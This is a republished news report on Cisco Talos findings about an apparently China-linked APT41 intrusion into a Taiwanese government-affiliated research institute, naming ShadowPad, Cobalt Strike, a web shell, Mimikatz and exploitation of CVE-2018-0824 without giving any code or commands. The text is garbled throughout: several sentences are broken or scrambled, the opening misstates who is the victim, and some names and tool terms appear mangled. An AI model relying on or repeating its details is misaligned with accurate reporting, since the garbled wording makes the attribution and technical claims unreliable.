02 August 2024Ravi LakshmananCyber ​​Espionage / Malware

china

According to new findings from Cisco Talos, a Taiwanese government-affiliated research firm that specializes in computing and related technologies, the breach was committed by nation-state threat actors with ties to China.

The unnamed organization was targeted as early as mid-July 2023 to provide a variety of backdoor and post-compromise tools such as Shadowpad and Cobalt Strike. It has been attributed with medium confidence to a hacking group that has been tracked. APT 41.

“The ShadowPad malware used in the current campaign used an older vulnerable version of the Microsoft Office IME binary as a loader to load a custom second-stage loader to launch the payload.” Security researchers Joey Chen, Ashley Shen, and Vetter Ventura said.

Cyber ​​security

“The threat actor compromised three hosts in the targeted environment and was able to extract some documents from the network.”

Cisco Talos said it discovered after detecting the activity in August 2023 that it specified “unusual PowerShell commands” to download and execute PowerShell scripts in a compromised environment. are associated with the IP address for

The initial access vector used in the attack is unknown, although it involved the use of a web shell to maintain persistent access and release additional payloads such as ShadowPad and CobaltStrike, followed by the Go-based CobaltStrike. was delivered by loader. Avoid CS-killing..

“The Cobalt Strike malware was developed using an anti-AV loader to bypass AV detection and evade security product quarantine,” the researchers said.

Alternately, the threat actor was observed running PowerShell commands to launch the script responsible for execution. Shadowpad Recover the Cobalt Strike malware in memory and from a compromised command and control (C2) server. DLL-based ShadowPad Loader, also known as Skeeter bis executed by DLL sideloading.

Some of the other steps taken as part of the intrusion included using Mimikatz to extract passwords and executing several commands to gather information about user accounts, directory structures, and network configuration. .

“APT41 made a suitable loader for proof-of-concept installation CVE-2018-0824 Directly in memory, using a remote code execution vulnerability to achieve local elevation of privilege,” Talos said, noting the final payload. UnmarshalPwnis released after passing through three different stages.

The cybersecurity organization also identified an adversary’s attempts to evade detection by stopping its activity upon detection of other users on the system. “Once the backdoor is deployed the malicious actor will delete the web shell and the guest account that allowed the initial access,” the researchers said.

This revelation came as Germany. revealed Earlier this week that Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Office of Cartography and Geodesy (BKG), for espionage purposes.

Responding to these allegations, the Chinese Embassy in Berlin… said The allegation is unfounded and calls on Germany to “stop using cyber security issues to discredit China politically and in the media.”

Did you find this article interesting? Follow us. Twitter And LinkedIn To read more exclusive content we post.





Source link